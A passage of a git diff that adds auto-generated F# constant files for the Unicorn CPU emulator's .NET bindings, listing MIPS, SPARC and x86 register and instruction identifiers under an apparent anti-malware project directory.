UC_MIPS_REG_FCC7 = 96 + + // AFPR128 + let UC_MIPS_REG_W0 = 97 + let UC_MIPS_REG_W1 = 98 + let UC_MIPS_REG_W2 = 99 + let UC_MIPS_REG_W3 = 100 + let UC_MIPS_REG_W4 = 101 + let UC_MIPS_REG_W5 = 102 + let UC_MIPS_REG_W6 = 103 + let UC_MIPS_REG_W7 = 104 + let UC_MIPS_REG_W8 = 105 + let UC_MIPS_REG_W9 = 106 + let UC_MIPS_REG_W10 = 107 + let UC_MIPS_REG_W11 = 108 + let UC_MIPS_REG_W12 = 109 + let UC_MIPS_REG_W13 = 110 + let UC_MIPS_REG_W14 = 111 + let UC_MIPS_REG_W15 = 112 + let UC_MIPS_REG_W16 = 113 + let UC_MIPS_REG_W17 = 114 + let UC_MIPS_REG_W18 = 115 + let UC_MIPS_REG_W19 = 116 + let UC_MIPS_REG_W20 = 117 + let UC_MIPS_REG_W21 = 118 + let UC_MIPS_REG_W22 = 119 + let UC_MIPS_REG_W23 = 120 + let UC_MIPS_REG_W24 = 121 + let UC_MIPS_REG_W25 = 122 + let UC_MIPS_REG_W26 = 123 + let UC_MIPS_REG_W27 = 124 + let UC_MIPS_REG_W28 = 125 + let UC_MIPS_REG_W29 = 126 + let UC_MIPS_REG_W30 = 127 + let UC_MIPS_REG_W31 = 128 + let UC_MIPS_REG_HI = 129 + let UC_MIPS_REG_LO = 130 + let UC_MIPS_REG_P0 = 131 + let UC_MIPS_REG_P1 = 132 + let UC_MIPS_REG_P2 = 133 + let UC_MIPS_REG_MPL0 = 134 + let UC_MIPS_REG_MPL1 = 135 + let UC_MIPS_REG_MPL2 = 136 + let UC_MIPS_REG_CP0_CONFIG3 = 137 + let UC_MIPS_REG_CP0_USERLOCAL = 138 + let UC_MIPS_REG_ENDING = 139 + let UC_MIPS_REG_ZERO = 2 + let UC_MIPS_REG_AT = 3 + let UC_MIPS_REG_V0 = 4 + let UC_MIPS_REG_V1 = 5 + let UC_MIPS_REG_A0 = 6 + let UC_MIPS_REG_A1 = 7 + let UC_MIPS_REG_A2 = 8 + let UC_MIPS_REG_A3 = 9 + let UC_MIPS_REG_T0 = 10 + let UC_MIPS_REG_T1 = 11 + let UC_MIPS_REG_T2 = 12 + let UC_MIPS_REG_T3 = 13 + let UC_MIPS_REG_T4 = 14 + let UC_MIPS_REG_T5 = 15 + let UC_MIPS_REG_T6 = 16 + let UC_MIPS_REG_T7 = 17 + let UC_MIPS_REG_S0 = 18 + let UC_MIPS_REG_S1 = 19 + let UC_MIPS_REG_S2 = 20 + let UC_MIPS_REG_S3 = 21 + let UC_MIPS_REG_S4 = 22 + let UC_MIPS_REG_S5 = 23 + let UC_MIPS_REG_S6 = 24 + let UC_MIPS_REG_S7 = 25 + let UC_MIPS_REG_T8 = 26 + let UC_MIPS_REG_T9 = 27 + let UC_MIPS_REG_K0 = 28 + let UC_MIPS_REG_K1 = 29 + let UC_MIPS_REG_GP = 30 + let UC_MIPS_REG_SP = 31 + let UC_MIPS_REG_FP = 32 + let UC_MIPS_REG_S8 = 32 + let UC_MIPS_REG_RA = 33 + let UC_MIPS_REG_HI0 = 45 + let UC_MIPS_REG_HI1 = 46 + let UC_MIPS_REG_HI2 = 47 + let UC_MIPS_REG_HI3 = 48 + let UC_MIPS_REG_LO0 = 45 + let UC_MIPS_REG_LO1 = 46 + let UC_MIPS_REG_LO2 = 47 + let UC_MIPS_REG_LO3 = 48 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Sparc.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Sparc.fs new file mode 100644 index 0000000..9a91e1a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Sparc.fs @@ -0,0 +1,104 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Sparc = + + // SPARC registers + + let UC_SPARC_REG_INVALID = 0 + let UC_SPARC_REG_F0 = 1 + let UC_SPARC_REG_F1 = 2 + let UC_SPARC_REG_F2 = 3 + let UC_SPARC_REG_F3 = 4 + let UC_SPARC_REG_F4 = 5 + let UC_SPARC_REG_F5 = 6 + let UC_SPARC_REG_F6 = 7 + let UC_SPARC_REG_F7 = 8 + let UC_SPARC_REG_F8 = 9 + let UC_SPARC_REG_F9 = 10 + let UC_SPARC_REG_F10 = 11 + let UC_SPARC_REG_F11 = 12 + let UC_SPARC_REG_F12 = 13 + let UC_SPARC_REG_F13 = 14 + let UC_SPARC_REG_F14 = 15 + let UC_SPARC_REG_F15 = 16 + let UC_SPARC_REG_F16 = 17 + let UC_SPARC_REG_F17 = 18 + let UC_SPARC_REG_F18 = 19 + let UC_SPARC_REG_F19 = 20 + let UC_SPARC_REG_F20 = 21 + let UC_SPARC_REG_F21 = 22 + let UC_SPARC_REG_F22 = 23 + let UC_SPARC_REG_F23 = 24 + let UC_SPARC_REG_F24 = 25 + let UC_SPARC_REG_F25 = 26 + let UC_SPARC_REG_F26 = 27 + let UC_SPARC_REG_F27 = 28 + let UC_SPARC_REG_F28 = 29 + let UC_SPARC_REG_F29 = 30 + let UC_SPARC_REG_F30 = 31 + let UC_SPARC_REG_F31 = 32 + let UC_SPARC_REG_F32 = 33 + let UC_SPARC_REG_F34 = 34 + let UC_SPARC_REG_F36 = 35 + let UC_SPARC_REG_F38 = 36 + let UC_SPARC_REG_F40 = 37 + let UC_SPARC_REG_F42 = 38 + let UC_SPARC_REG_F44 = 39 + let UC_SPARC_REG_F46 = 40 + let UC_SPARC_REG_F48 = 41 + let UC_SPARC_REG_F50 = 42 + let UC_SPARC_REG_F52 = 43 + let UC_SPARC_REG_F54 = 44 + let UC_SPARC_REG_F56 = 45 + let UC_SPARC_REG_F58 = 46 + let UC_SPARC_REG_F60 = 47 + let UC_SPARC_REG_F62 = 48 + let UC_SPARC_REG_FCC0 = 49 + let UC_SPARC_REG_FCC1 = 50 + let UC_SPARC_REG_FCC2 = 51 + let UC_SPARC_REG_FCC3 = 52 + let UC_SPARC_REG_G0 = 53 + let UC_SPARC_REG_G1 = 54 + let UC_SPARC_REG_G2 = 55 + let UC_SPARC_REG_G3 = 56 + let UC_SPARC_REG_G4 = 57 + let UC_SPARC_REG_G5 = 58 + let UC_SPARC_REG_G6 = 59 + let UC_SPARC_REG_G7 = 60 + let UC_SPARC_REG_I0 = 61 + let UC_SPARC_REG_I1 = 62 + let UC_SPARC_REG_I2 = 63 + let UC_SPARC_REG_I3 = 64 + let UC_SPARC_REG_I4 = 65 + let UC_SPARC_REG_I5 = 66 + let UC_SPARC_REG_FP = 67 + let UC_SPARC_REG_I7 = 68 + let UC_SPARC_REG_ICC = 69 + let UC_SPARC_REG_L0 = 70 + let UC_SPARC_REG_L1 = 71 + let UC_SPARC_REG_L2 = 72 + let UC_SPARC_REG_L3 = 73 + let UC_SPARC_REG_L4 = 74 + let UC_SPARC_REG_L5 = 75 + let UC_SPARC_REG_L6 = 76 + let UC_SPARC_REG_L7 = 77 + let UC_SPARC_REG_O0 = 78 + let UC_SPARC_REG_O1 = 79 + let UC_SPARC_REG_O2 = 80 + let UC_SPARC_REG_O3 = 81 + let UC_SPARC_REG_O4 = 82 + let UC_SPARC_REG_O5 = 83 + let UC_SPARC_REG_SP = 84 + let UC_SPARC_REG_O7 = 85 + let UC_SPARC_REG_Y = 86 + let UC_SPARC_REG_XCC = 87 + let UC_SPARC_REG_PC = 88 + let UC_SPARC_REG_ENDING = 89 + let UC_SPARC_REG_O6 = 84 + let UC_SPARC_REG_I6 = 67 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/X86.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/X86.fs new file mode 100644 index 0000000..ad16a84 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/X86.fs @@ -0,0 +1,1607 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module X86 = + + // X86 registers + + let UC_X86_REG_INVALID = 0 + let UC_X86_REG_AH = 1 + let UC_X86_REG_AL = 2 + let UC_X86_REG_AX = 3 + let UC_X86_REG_BH = 4 + let UC_X86_REG_BL = 5 + let UC_X86_REG_BP = 6 + let UC_X86_REG_BPL = 7 + let UC_X86_REG_BX = 8 + let UC_X86_REG_CH = 9 + let UC_X86_REG_CL = 10 + let UC_X86_REG_CS = 11 + let UC_X86_REG_CX = 12 + let UC_X86_REG_DH = 13 + let UC_X86_REG_DI = 14 + let UC_X86_REG_DIL = 15 + let UC_X86_REG_DL = 16 + let UC_X86_REG_DS = 17 + let UC_X86_REG_DX = 18 + let UC_X86_REG_EAX = 19 + let UC_X86_REG_EBP = 20 + let UC_X86_REG_EBX = 21 + let UC_X86_REG_ECX = 22 + let UC_X86_REG_EDI = 23 + let UC_X86_REG_EDX = 24 + let UC_X86_REG_EFLAGS = 25 + let UC_X86_REG_EIP = 26 + let UC_X86_REG_EIZ = 27 + let UC_X86_REG_ES = 28 + let UC_X86_REG_ESI = 29 + let UC_X86_REG_ESP = 30 + let UC_X86_REG_FPSW = 31 + let UC_X86_REG_FS = 32 + let UC_X86_REG_GS = 33 + let UC_X86_REG_IP = 34 + let UC_X86_REG_RAX = 35 + let UC_X86_REG_RBP = 36 + let UC_X86_REG_RBX = 37 + let UC_X86_REG_RCX = 38 + let UC_X86_REG_RDI = 39 + let UC_X86_REG_RDX = 40 + let UC_X86_REG_RIP = 41 + let UC_X86_REG_RIZ = 42 + let UC_X86_REG_RSI = 43 + let UC_X86_REG_RSP = 44 + let UC_X86_REG_SI = 45 + let UC_X86_REG_SIL = 46 + let UC_X86_REG_SP = 47 + let UC_X86_REG_SPL = 48 + let UC_X86_REG_SS = 49 + let UC_X86_REG_CR0 = 50 + let UC_X86_REG_CR1 = 51 + let UC_X86_REG_CR2 = 52 + let UC_X86_REG_CR3 = 53 + let UC_X86_REG_CR4 = 54 + let UC_X86_REG_CR5 = 55 + let UC_X86_REG_CR6 = 56 + let UC_X86_REG_CR7 = 57 + let UC_X86_REG_CR8 = 58 + let UC_X86_REG_CR9 = 59 + let UC_X86_REG_CR10 = 60 + let UC_X86_REG_CR11 = 61 + let UC_X86_REG_CR12 = 62 + let UC_X86_REG_CR13 = 63 + let UC_X86_REG_CR14 = 64 + let UC_X86_REG_CR15 = 65 + let UC_X86_REG_DR0 = 66 + let UC_X86_REG_DR1 = 67 + let UC_X86_REG_DR2 = 68 + let UC_X86_REG_DR3 = 69 + let UC_X86_REG_DR4 = 70 + let UC_X86_REG_DR5 = 71 + let UC_X86_REG_DR6 = 72 + let UC_X86_REG_DR7 = 73 + let UC_X86_REG_DR8 = 74 + let UC_X86_REG_DR9 = 75 + let UC_X86_REG_DR10 = 76 + let UC_X86_REG_DR11 = 77 + let UC_X86_REG_DR12 = 78 + let UC_X86_REG_DR13 = 79 + let UC_X86_REG_DR14 = 80 + let UC_X86_REG_DR15 = 81 + let UC_X86_REG_FP0 = 82 + let UC_X86_REG_FP1 = 83 + let UC_X86_REG_FP2 = 84 + let UC_X86_REG_FP3 = 85 + let UC_X86_REG_FP4 = 86 + let UC_X86_REG_FP5 = 87 + let UC_X86_REG_FP6 = 88 + let UC_X86_REG_FP7 = 89 + let UC_X86_REG_K0 = 90 + let UC_X86_REG_K1 = 91 + let UC_X86_REG_K2 = 92 + let UC_X86_REG_K3 = 93 + let UC_X86_REG_K4 = 94 + let UC_X86_REG_K5 = 95 + let UC_X86_REG_K6 = 96 + let UC_X86_REG_K7 = 97 + let UC_X86_REG_MM0 = 98 + let UC_X86_REG_MM1 = 99 + let UC_X86_REG_MM2 = 100 + let UC_X86_REG_MM3 = 101 + let UC_X86_REG_MM4 = 102 + let UC_X86_REG_MM5 = 103 + let UC_X86_REG_MM6 = 104 + let UC_X86_REG_MM7 = 105 + let UC_X86_REG_R8 = 106 + let UC_X86_REG_R9 = 107 + let UC_X86_REG_R10 = 108 + let UC_X86_REG_R11 = 109 + let UC_X86_REG_R12 = 110 + let UC_X86_REG_R13 = 111 + let UC_X86_REG_R14 = 112 + let UC_X86_REG_R15 = 113 + let UC_X86_REG_ST0 = 114 + let UC_X86_REG_ST1 = 115 + let UC_X86_REG_ST2 = 116 + let UC_X86_REG_ST3 = 117 + let UC_X86_REG_ST4 = 118 + let UC_X86_REG_ST5 = 119 + let UC_X86_REG_ST6 = 120 + let UC_X86_REG_ST7 = 121 + let UC_X86_REG_XMM0 = 122 + let UC_X86_REG_XMM1 = 123 + let UC_X86_REG_XMM2 = 124 + let UC_X86_REG_XMM3 = 125 + let UC_X86_REG_XMM4 = 126 + let UC_X86_REG_XMM5 = 127 + let UC_X86_REG_XMM6 = 128 + let UC_X86_REG_XMM7 = 129 + let UC_X86_REG_XMM8 = 130 + let UC_X86_REG_XMM9 = 131 + let UC_X86_REG_XMM10 = 132 + let UC_X86_REG_XMM11 = 133 + let UC_X86_REG_XMM12 = 134 + let UC_X86_REG_XMM13 = 135 + let UC_X86_REG_XMM14 = 136 + let UC_X86_REG_XMM15 = 137 + let UC_X86_REG_XMM16 = 138 + let UC_X86_REG_XMM17 = 139 + let UC_X86_REG_XMM18 = 140 + let UC_X86_REG_XMM19 = 141 + let UC_X86_REG_XMM20 = 142 + let UC_X86_REG_XMM21 = 143 + let UC_X86_REG_XMM22 = 144 + let UC_X86_REG_XMM23 = 145 + let UC_X86_REG_XMM24 = 146 + let UC_X86_REG_XMM25 = 147 + let UC_X86_REG_XMM26 = 148 + let UC_X86_REG_XMM27 = 149 + let UC_X86_REG_XMM28 = 150 + let UC_X86_REG_XMM29 = 151 + let UC_X86_REG_XMM30 = 152 + let UC_X86_REG_XMM31 = 153 + let UC_X86_REG_YMM0 = 154 + let UC_X86_REG_YMM1 = 155 + let UC_X86_REG_YMM2 = 156 + let UC_X86_REG_YMM3 = 157 + let UC_X86_REG_YMM4 = 158 + let UC_X86_REG_YMM5 = 159 + let UC_X86_REG_YMM6 = 160 + let UC_X86_REG_YMM7 = 161 + let UC_X86_REG_YMM8 = 162 + let UC_X86_REG_YMM9 = 163 + let UC_X86_REG_YMM10 = 164 + let UC_X86_REG_YMM11 = 165 + let UC_X86_REG_YMM12 = 166 + let UC_X86_REG_YMM13 = 167 + let UC_X86_REG_YMM14 = 168 + let UC_X86_REG_YMM15 = 169 + let UC_X86_REG_YMM16 = 170 + let UC_X86_REG_YMM17 = 171 + let UC_X86_REG_YMM18 = 172 + let UC_X86_REG_YMM19 = 173 + let UC_X86_REG_YMM20 = 174 + let UC_X86_REG_YMM21 = 175 + let UC_X86_REG_YMM22 = 176 + let UC_X86_REG_YMM23 = 177 + let UC_X86_REG_YMM24 = 178 + let UC_X86_REG_YMM25 = 179 + let UC_X86_REG_YMM26 = 180 + let UC_X86_REG_YMM27 = 181 + let UC_X86_REG_YMM28 = 182 + let UC_X86_REG_YMM29 = 183 + let UC_X86_REG_YMM30 = 184 + let UC_X86_REG_YMM31 = 185 + let UC_X86_REG_ZMM0 = 186 + let UC_X86_REG_ZMM1 = 187 + let UC_X86_REG_ZMM2 = 188 + let UC_X86_REG_ZMM3 = 189 + let UC_X86_REG_ZMM4 = 190 + let UC_X86_REG_ZMM5 = 191 + let UC_X86_REG_ZMM6 = 192 + let UC_X86_REG_ZMM7 = 193 + let UC_X86_REG_ZMM8 = 194 + let UC_X86_REG_ZMM9 = 195 + let UC_X86_REG_ZMM10 = 196 + let UC_X86_REG_ZMM11 = 197 + let UC_X86_REG_ZMM12 = 198 + let UC_X86_REG_ZMM13 = 199 + let UC_X86_REG_ZMM14 = 200 + let UC_X86_REG_ZMM15 = 201 + let UC_X86_REG_ZMM16 = 202 + let UC_X86_REG_ZMM17 = 203 + let UC_X86_REG_ZMM18 = 204 + let UC_X86_REG_ZMM19 = 205 + let UC_X86_REG_ZMM20 = 206 + let UC_X86_REG_ZMM21 = 207 + let UC_X86_REG_ZMM22 = 208 + let UC_X86_REG_ZMM23 = 209 + let UC_X86_REG_ZMM24 = 210 + let UC_X86_REG_ZMM25 = 211 + let UC_X86_REG_ZMM26 = 212 + let UC_X86_REG_ZMM27 = 213 + let UC_X86_REG_ZMM28 = 214 + let UC_X86_REG_ZMM29 = 215 + let UC_X86_REG_ZMM30 = 216 + let UC_X86_REG_ZMM31 = 217 + let UC_X86_REG_R8B = 218 + let UC_X86_REG_R9B = 219 + let UC_X86_REG_R10B = 220 + let UC_X86_REG_R11B = 221 + let UC_X86_REG_R12B = 222 + let UC_X86_REG_R13B = 223 + let UC_X86_REG_R14B = 224 + let UC_X86_REG_R15B = 225 + let UC_X86_REG_R8D = 226 + let UC_X86_REG_R9D = 227 + let UC_X86_REG_R10D = 228 + let UC_X86_REG_R11D = 229 + let UC_X86_REG_R12D = 230 + let UC_X86_REG_R13D = 231 + let UC_X86_REG_R14D = 232 + let UC_X86_REG_R15D = 233 + let UC_X86_REG_R8W = 234 + let UC_X86_REG_R9W = 235 + let UC_X86_REG_R10W = 236 + let UC_X86_REG_R11W = 237 + let UC_X86_REG_R12W = 238 + let UC_X86_REG_R13W = 239 + let UC_X86_REG_R14W = 240 + let UC_X86_REG_R15W = 241 + let UC_X86_REG_IDTR = 242 + let UC_X86_REG_GDTR = 243 + let UC_X86_REG_LDTR = 244 + let UC_X86_REG_TR = 245 + let UC_X86_REG_FPCW = 246 + let UC_X86_REG_FPTAG = 247 + let UC_X86_REG_MSR = 248 + let UC_X86_REG_MXCSR = 249 + let UC_X86_REG_FS_BASE = 250 + let UC_X86_REG_GS_BASE = 251 + let UC_X86_REG_ENDING = 252 + + // X86 instructions + + let UC_X86_INS_INVALID = 0 + let UC_X86_INS_AAA = 1 + let UC_X86_INS_AAD = 2 + let UC_X86_INS_AAM = 3 + let UC_X86_INS_AAS = 4 + let UC_X86_INS_FABS = 5 + let UC_X86_INS_ADC = 6 + let UC_X86_INS_ADCX = 7 + let UC_X86_INS_ADD = 8 + let UC_X86_INS_ADDPD = 9 + let UC_X86_INS_ADDPS = 10 + let UC_X86_INS_ADDSD = 11 + let UC_X86_INS_ADDSS = 12 + let UC_X86_INS_ADDSUBPD = 13 + let UC_X86_INS_ADDSUBPS = 14 + let UC_X86_INS_FADD = 15 + let UC_X86_INS_FIADD = 16 + let UC_X86_INS_FADDP = 17 + let UC_X86_INS_ADOX = 18 + let UC_X86_INS_AESDECLAST = 19 + let UC_X86_INS_AESDEC = 20 + let UC_X86_INS_AESENCLAST = 21 + let UC_X86_INS_AESENC = 22 + let UC_X86_INS_AESIMC = 23 + let UC_X86_INS_AESKEYGENASSIST = 24 + let UC_X86_INS_AND = 25 + let UC_X86_INS_ANDN = 26 + let UC_X86_INS_ANDNPD = 27 + let UC_X86_INS_ANDNPS = 28 + let UC_X86_INS_ANDPD = 29 + let UC_X86_INS_ANDPS = 30 + let UC_X86_INS_ARPL = 31 + let UC_X86_INS_BEXTR = 32 + let UC_X86_INS_BLCFILL = 33 + let UC_X86_INS_BLCI = 34 + let UC_X86_INS_BLCIC = 35 + let UC_X86_INS_BLCMSK = 36 + let UC_X86_INS_BLCS = 37 + let UC_X86_INS_BLENDPD = 38 + let UC_X86_INS_BLENDPS = 39 + let UC_X86_INS_BLENDVPD = 40 + let UC_X86_INS_BLENDVPS = 41 + let UC_X86_INS_BLSFILL = 42 + let UC_X86_INS_BLSI = 43 + let UC_X86_INS_BLSIC = 44 + let UC_X86_INS_BLSMSK = 45 + let UC_X86_INS_BLSR = 46 + let UC_X86_INS_BOUND = 47 + let UC_X86_INS_BSF = 48 + let UC_X86_INS_BSR = 49 + let UC_X86_INS_BSWAP = 50 + let UC_X86_INS_BT = 51 + let UC_X86_INS_BTC = 52 + let UC_X86_INS_BTR = 53 + let UC_X86_INS_BTS = 54 + let UC_X86_INS_BZHI = 55 + let UC_X86_INS_CALL = 56 + let UC_X86_INS_CBW = 57 + let UC_X86_INS_CDQ = 58 + let UC_X86_INS_CDQE = 59 + let UC_X86_INS_FCHS = 60 + let UC_X86_INS_CLAC = 61 + let UC_X86_INS_CLC = 62 + let UC_X86_INS_CLD = 63 + let UC_X86_INS_CLFLUSH = 64 + let UC_X86_INS_CLFLUSHOPT = 65 + let UC_X86_INS_CLGI = 66 + let UC_X86_INS_CLI = 67 + let UC_X86_INS_CLTS = 68 + let UC_X86_INS_CLWB = 69 + let UC_X86_INS_CMC = 70 + let UC_X86_INS_CMOVA = 71 + let UC_X86_INS_CMOVAE = 72 + let UC_X86_INS_CMOVB = 73 + let UC_X86_INS_CMOVBE = 74 + let UC_X86_INS_FCMOVBE = 75 + let UC_X86_INS_FCMOVB = 76 + let UC_X86_INS_CMOVE = 77 + let UC_X86_INS_FCMOVE = 78 + let UC_X86_INS_CMOVG = 79 + let UC_X86_INS_CMOVGE = 80 + let UC_X86_INS_CMOVL = 81 + let UC_X86_INS_CMOVLE = 82 + let UC_X86_INS_FCMOVNBE = 83 + let UC_X86_INS_FCMOVNB = 84 + let UC_X86_INS_CMOVNE = 85 + let UC_X86_INS_FCMOVNE = 86 + let UC_X86_INS_CMOVNO = 87 + let UC_X86_INS_CMOVNP = 88 + let UC_X86_INS_FCMOVNU = 89 + let UC_X86_INS_CMOVNS = 90 + let UC_X86_INS_CMOVO = 91 + let UC_X86_INS_CMOVP = 92 + let UC_X86_INS_FCMOVU = 93 + let UC_X86_INS_CMOVS = 94 + let UC_X86_INS_CMP = 95 + let UC_X86_INS_CMPPD = 96 + let UC_X86_INS_CMPPS = 97 + let UC_X86_INS_CMPSB = 98 + let UC_X86_INS_CMPSD = 99 + let UC_X86_INS_CMPSQ = 100 + let UC_X86_INS_CMPSS = 101 + let UC_X86_INS_CMPSW = 102 + let UC_X86_INS_CMPXCHG16B = 103 + let UC_X86_INS_CMPXCHG = 104 + let UC_X86_INS_CMPXCHG8B = 105 + let UC_X86_INS_COMISD = 106 + let UC_X86_INS_COMISS = 107 + let UC_X86_INS_FCOMP = 108 + let UC_X86_INS_FCOMPI = 109 + let UC_X86_INS_FCOMI = 110 + let UC_X86_INS_FCOM = 111 + let UC_X86_INS_FCOS = 112 + let UC_X86_INS_CPUID = 113 + let UC_X86_INS_CQO = 114 + let UC_X86_INS_CRC32 = 115 + let UC_X86_INS_CVTDQ2PD = 116 + let UC_X86_INS_CVTDQ2PS = 117 + let UC_X86_INS_CVTPD2DQ = 118 + let UC_X86_INS_CVTPD2PS = 119 + let UC_X86_INS_CVTPS2DQ = 120 + let UC_X86_INS_CVTPS2PD = 121 + let UC_X86_INS_CVTSD2SI = 122 + let UC_X86_INS_CVTSD2SS = 123 + let UC_X86_INS_CVTSI2SD = 124 + let UC_X86_INS_CVTSI2SS = 125 + let UC_X86_INS_CVTSS2SD = 126 + let UC_X86_INS_CVTSS2SI = 127 + let UC_X86_INS_CVTTPD2DQ = 128 + let UC_X86_INS_CVTTPS2DQ = 129 + let UC_X86_INS_CVTTSD2SI = 130 + let UC_X86_INS_CVTTSS2SI = 131 + let UC_X86_INS_CWD = 132 + let UC_X86_INS_CWDE = 133 + let UC_X86_INS_DAA = 134 + let UC_X86_INS_DAS = 135 + let UC_X86_INS_DATA16 = 136 + let UC_X86_INS_DEC = 137 + let UC_X86_INS_DIV = 138 + let UC_X86_INS_DIVPD = 139 + let UC_X86_INS_DIVPS = 140 + let UC_X86_INS_FDIVR = 141 + let UC_X86_INS_FIDIVR = 142 + let UC_X86_INS_FDIVRP = 143 + let UC_X86_INS_DIVSD = 144 + let UC_X86_INS_DIVSS = 145 + let UC_X86_INS_FDIV = 146 + let UC_X86_INS_FIDIV = 147 + let UC_X86_INS_FDIVP = 148 + let UC_X86_INS_DPPD = 149 + let UC_X86_INS_DPPS = 150 + let UC_X86_INS_RET = 151 + let UC_X86_INS_ENCLS = 152 + let UC_X86_INS_ENCLU = 153 + let UC_X86_INS_ENTER = 154 + let UC_X86_INS_EXTRACTPS = 155 + let UC_X86_INS_EXTRQ = 156 + let UC_X86_INS_F2XM1 = 157 + let UC_X86_INS_LCALL = 158 + let UC_X86_INS_LJMP = 159 + let UC_X86_INS_FBLD = 160 + let UC_X86_INS_FBSTP = 161 + let UC_X86_INS_FCOMPP = 162 + let UC_X86_INS_FDECSTP = 163 + let UC_X86_INS_FEMMS = 164 + let UC_X86_INS_FFREE = 165 + let UC_X86_INS_FICOM = 166 + let UC_X86_INS_FICOMP = 167 + let UC_X86_INS_FINCSTP = 168 + let UC_X86_INS_FLDCW = 169 + let UC_X86_INS_FLDENV = 170 + let UC_X86_INS_FLDL2E = 171 + let UC_X86_INS_FLDL2T = 172 + let UC_X86_INS_FLDLG2 = 173 + let UC_X86_INS_FLDLN2 = 174 + let UC_X86_INS_FLDPI = 175 + let UC_X86_INS_FNCLEX = 176 + let UC_X86_INS_FNINIT = 177 + let UC_X86_INS_FNOP = 178 + let UC_X86_INS_FNSTCW = 179 + let UC_X86_INS_FNSTSW = 180 + let UC_X86_INS_FPATAN = 181 + let UC_X86_INS_FPREM = 182 + let UC_X86_INS_FPREM1 = 183 + let UC_X86_INS_FPTAN = 184 + let UC_X86_INS_FFREEP = 185 + let UC_X86_INS_FRNDINT = 186 + let UC_X86_INS_FRSTOR = 187 + let UC_X86_INS_FNSAVE = 188 + let UC_X86_INS_FSCALE = 189 + let UC_X86_INS_FSETPM = 190 + let UC_X86_INS_FSINCOS = 191 + let UC_X86_INS_FNSTENV = 192 + let UC_X86_INS_FXAM = 193 + let UC_X86_INS_FXRSTOR = 194 + let UC_X86_INS_FXRSTOR64 = 195 + let UC_X86_INS_FXSAVE = 196 + let UC_X86_INS_FXSAVE64 = 197 + let UC_X86_INS_FXTRACT = 198 + let UC_X86_INS_FYL2X = 199 + let UC_X86_INS_FYL2XP1 = 200 + let UC_X86_INS_MOVAPD = 201 + let UC_X86_INS_MOVAPS = 202 + let UC_X86_INS_ORPD = 203 + let UC_X86_INS_ORPS = 204 + let UC_X86_INS_VMOVAPD = 205 + let UC_X86_INS_VMOVAPS = 206 + let UC_X86_INS_XORPD = 207 + let UC_X86_INS_XORPS = 208 + let UC_X86_INS_GETSEC = 209 + let UC_X86_INS_HADDPD = 210 + let UC_X86_INS_HADDPS = 211 + let UC_X86_INS_HLT = 212 + let UC_X86_INS_HSUBPD = 213 + let UC_X86_INS_HSUBPS = 214 + let UC_X86_INS_IDIV = 215 + let UC_X86_INS_FILD = 216 + let UC_X86_INS_IMUL = 217 + let UC_X86_INS_IN = 218 + let UC_X86_INS_INC = 219 + let UC_X86_INS_INSB = 220 + let UC_X86_INS_INSERTPS = 221 + let UC_X86_INS_INSERTQ = 222 + let UC_X86_INS_INSD = 223 + let UC_X86_INS_INSW = 224 + let UC_X86_INS_INT = 225 + let UC_X86_INS_INT1 = 226 + let UC_X86_INS_INT3 = 227 + let UC_X86_INS_INTO = 228 + let UC_X86_INS_INVD = 229 + let UC_X86_INS_INVEPT = 230 + let UC_X86_INS_INVLPG = 231 + let UC_X86_INS_INVLPGA = 232 + let UC_X86_INS_INVPCID = 233 + let UC_X86_INS_INVVPID = 234 + let UC_X86_INS_IRET = 235 + let UC_X86_INS_IRETD = 236 + let UC_X86_INS_IRETQ = 237 + let UC_X86_INS_FISTTP = 238 + let UC_X86_INS_FIST = 239 + let UC_X86_INS_FISTP = 240 + let UC_X86_INS_UCOMISD = 241 + let UC_X86_INS_UCOMISS = 242 + let UC_X86_INS_VCOMISD = 243 + let UC_X86_INS_VCOMISS = 244 + let UC_X86_INS_VCVTSD2SS = 245 + let UC_X86_INS_VCVTSI2SD = 246 + let UC_X86_INS_VCVTSI2SS = 247 + let UC_X86_INS_VCVTSS2SD = 248 + let UC_X86_INS_VCVTTSD2SI = 249 + let UC_X86_INS_VCVTTSD2USI = 250 + let UC_X86_INS_VCVTTSS2SI = 251 + let UC_X86_INS_VCVTTSS2USI = 252 + let UC_X86_INS_VCVTUSI2SD = 253 + let UC_X86_INS_VCVTUSI2SS = 254 + let UC_X86_INS_VUCOMISD = 255 + let UC_X86_INS_VUCOMISS = 256 + let UC_X86_INS_JAE = 257 + let UC_X86_INS_JA = 258 + let UC_X86_INS_JBE = 259 + let UC_X86_INS_JB = 260 + let UC_X86_INS_JCXZ = 261 + let UC_X86_INS_JECXZ = 262 + let UC_X86_INS_JE = 263 + let UC_X86_INS_JGE = 264 + let UC_X86_INS_JG = 265 + let UC_X86_INS_JLE = 266 + let UC_X86_INS_JL = 267 + let UC_X86_INS_JMP = 268 + let UC_X86_INS_JNE = 269 + let UC_X86_INS_JNO = 270 + let UC_X86_INS_JNP = 271 + let UC_X86_INS_JNS = 272 + let UC_X86_INS_JO = 273 + let UC_X86_INS_JP = 274 + let UC_X86_INS_JRCXZ = 275 + let UC_X86_INS_JS = 276 + let UC_X86_INS_KANDB = 277 + let UC_X86_INS_KANDD = 278 + let UC_X86_INS_KANDNB = 279 + let UC_X86_INS_KANDND = 280 + let UC_X86_INS_KANDNQ = 281 + let UC_X86_INS_KANDNW = 282 + let UC_X86_INS_KANDQ = 283 + let UC_X86_INS_KANDW = 284 + let UC_X86_INS_KMOVB = 285 + let UC_X86_INS_KMOVD = 286 + let UC_X86_INS_KMOVQ = 287 + let UC_X86_INS_KMOVW = 288 + let UC_X86_INS_KNOTB = 289 + let UC_X86_INS_KNOTD = 290 + let UC_X86_INS_KNOTQ = 291 + let UC_X86_INS_KNOTW = 292 + let UC_X86_INS_KORB = 293 + let UC_X86_INS_KORD = 294 + let UC_X86_INS_KORQ = 295 + let UC_X86_INS_KORTESTB = 296 + let UC_X86_INS_KORTESTD = 297 + let UC_X86_INS_KORTESTQ = 298 + 